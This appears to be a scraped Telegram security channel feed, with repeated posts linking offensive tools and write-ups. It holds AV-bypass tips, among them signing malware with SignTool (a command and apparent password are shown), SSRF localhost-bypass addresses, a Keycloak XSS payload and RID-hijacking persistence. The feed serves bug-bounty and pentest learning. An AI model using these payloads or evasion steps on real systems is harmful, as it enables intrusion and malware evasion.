InvisibilityCloak
Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio project.
https://github.com/xforcered/InvisibilityCloak
#obfuscation #av #bypass
Proof-of-concept obfuscation toolkit for C# post-exploitation tools. This will perform the below actions for a C# visual studio project.
https://github.com/xforcered/InvisibilityCloak
#obfuscation #av #bypass
GitHub
GitHub - xforcered/InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation tools
Proof-of-concept obfuscation toolkit for C# post-exploitation tools - xforcered/InvisibilityCloak
🔥 Antivirus Bypass using Code Signing 🔥
Code signing is a method software publishers use to authenticate the programs they distribute to end-users. Basically, a code-signed program tells the end-user and an end-user’s computer that the program being installed/executed is from a legitimate software publisher.
Digitally signed malware can bypass system protection mechanisms that install or launch only programs with valid signatures
You can use the SignTool to sign file with a valid certificate Go Daddy.
For example:
Don't forget to share and subscribe
#av #bypass #ev #signing #code
Code signing is a method software publishers use to authenticate the programs they distribute to end-users. Basically, a code-signed program tells the end-user and an end-user’s computer that the program being installed/executed is from a legitimate software publisher.
Digitally signed malware can bypass system protection mechanisms that install or launch only programs with valid signatures
You can use the SignTool to sign file with a valid certificate Go Daddy.
For example:
signtool.exe sign /f t.iss.one_secdevoops.pfx /p "*Aspider#" /t https://timestamp.digicert.com .\yourfile
.exe
This allows you to digitally sign PE binaries such as .exe, .cab, .dll, .ocx, .msi, .xpi and .xap files.Don't forget to share and subscribe
#av #bypass #ev #signing #code
RID Hijacking: Maintaining access on Windows machines
https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
https://github.com/r4wd3r/RID-Hijacking
#rid #hijack
https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html
https://github.com/r4wd3r/RID-Hijacking
#rid #hijack
Blogspot
RID Hijacking: Maintaining access on Windows machines
Read the full academic paper at ACM CCS CheckMATE 24 - Ghost in the SAM: Stealthy, Robust, and Privileged Persistence through Invisible Acc...
Best SSRF bypass
#ssrf #bugbounty #bugbountytips
https://127.1/
https://0000::1:80/
https://[::]:80/
https://2130706433/
https://[email protected]
https://0x7f000001/
https://017700000001
https://0177.00.00.01#ssrf #bugbounty #bugbountytips
Chrome Extensions for Bug Bounty Hunters
1) Wappalyzer
2) Shodan
3) HackTools
4) Penetration Testing Kit
5) Mitaka
6) HackerTarget
7) Snov.io
8) Hunter - Email Finder Extension
9) EditThisCookie
10) User-Agent Switcher
11) d3coder
12) Trufflehog
13) DotGit
14) Retire.js
# https://securitytrails.com/blog/bug-bounty-hunting-browser-extensions
#chrome #extensions #bugbounty
1) Wappalyzer
2) Shodan
3) HackTools
4) Penetration Testing Kit
5) Mitaka
6) HackerTarget
7) Snov.io
8) Hunter - Email Finder Extension
9) EditThisCookie
10) User-Agent Switcher
11) d3coder
12) Trufflehog
13) DotGit
14) Retire.js
# https://securitytrails.com/blog/bug-bounty-hunting-browser-extensions
#chrome #extensions #bugbounty
👍1
From Zero to Domain Admin
https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/
#blueteam #writeup
https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/
#blueteam #writeup
The DFIR Report
From Zero to Domain Admin
Intro This report will go through an intrusion from July that began with an email, which included a link to Google’s Feed Proxy service that was used to download a malicious Word document. Up…
Django Debug Mode Bypass
https://target/login?next=/#bugbounty #bugbountytips #bugbountytip
https://target/admin
[301 to https://target/admin/login/?next=/admin/]
Change request to [POST]
[500 Django DEBUG mode and vary bad information]
This media is not supported in your browser
VIEW IN TELEGRAM
ScoutSuite
Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.
# https://github.com/nccgroup/ScoutSuite
# https://github.com/nccgroup/sadcloud
#aws #azure #gcp #auditing #tool
Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.
# https://github.com/nccgroup/ScoutSuite
# https://github.com/nccgroup/sadcloud
#aws #azure #gcp #auditing #tool
GitHub
GitHub - nccgroup/ScoutSuite: Multi-Cloud Security Auditing Tool
Multi-Cloud Security Auditing Tool. Contribute to nccgroup/ScoutSuite development by creating an account on GitHub.
Forwarded from PT SWARM
How to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus
👤 by Antoine Cervoise, Wilfried Bécard
ADSS offers multiple functionalities such as managing password policies for administrators or self password reset/account unlock for Active Directory users.
In this article research team explore the details of several vulnerabilities that allow an unauthenticated attacker to execute arbitrary code on the server.
📝 Contents:
• First steps
• Authentication Bypass
• Arbitrary file upload through the API
• Arguments injection
• Chaining everything together to get code execution
• Conclusion
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
👤 by Antoine Cervoise, Wilfried Bécard
ADSS offers multiple functionalities such as managing password policies for administrators or self password reset/account unlock for Active Directory users.
In this article research team explore the details of several vulnerabilities that allow an unauthenticated attacker to execute arbitrary code on the server.
📝 Contents:
• First steps
• Authentication Bypass
• Arbitrary file upload through the API
• Arguments injection
• Chaining everything together to get code execution
• Conclusion
https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
Synacktiv
How to exploit CVE-2021-40539 on ManageEngine ADSelfService Plus
HackTheBox - PivotAPI
https://youtu.be/FbTxPz_GA4o
https://youtu.be/hzsGMj9C8Nw
https://0xdf.gitlab.io/2021/11/06/htb-pivotapi.html
#htb #writeup #ad #reverse
https://youtu.be/FbTxPz_GA4o
https://youtu.be/hzsGMj9C8Nw
https://0xdf.gitlab.io/2021/11/06/htb-pivotapi.html
#htb #writeup #ad #reverse
YouTube
HackTheBox - PivotAPI
00:00 - Intro
01:00 - Start of nmap, downloading files over FTP
05:25 - The contents of all the PDF's don't really help. Using exiftool to extract authors.
08:20 - Using Kerbrute to bruteforce valid users and getting ASREP Hash. It is ETYPE 18, which hashcat…
01:00 - Start of nmap, downloading files over FTP
05:25 - The contents of all the PDF's don't really help. Using exiftool to extract authors.
08:20 - Using Kerbrute to bruteforce valid users and getting ASREP Hash. It is ETYPE 18, which hashcat…
Keycloak POST-based Reflected XSS
1. POST
#bugbounty #keycloak #xss
1. POST
/auth/realms/master/clientsregistrations/openid-connect
2. Content-Type: application/json
3. Request {"<svg onload=alert(document.domain)>":1}
4. Unfiltered user-input in error message will triggered XSS#bugbounty #keycloak #xss
KubiScan
KubiScan helps cluster administrators identify permissions that attackers could potentially exploit to compromise the clusters. This can be especially helpful on large environments where there are lots of permissions that can be challenging to track. KubiScan gathers information about risky roles\clusterroles, rolebindings\clusterrolebindings, users and pods, automating traditional manual processes and giving administrators the visibility they need to reduce risk.
https://github.com/cyberark/KubiScan
#kubernetes #rbac #scan #security #tools
KubiScan helps cluster administrators identify permissions that attackers could potentially exploit to compromise the clusters. This can be especially helpful on large environments where there are lots of permissions that can be challenging to track. KubiScan gathers information about risky roles\clusterroles, rolebindings\clusterrolebindings, users and pods, automating traditional manual processes and giving administrators the visibility they need to reduce risk.
https://github.com/cyberark/KubiScan
#kubernetes #rbac #scan #security #tools
GitHub
GitHub - cyberark/KubiScan: A tool to scan Kubernetes cluster for risky permissions
A tool to scan Kubernetes cluster for risky permissions - cyberark/KubiScan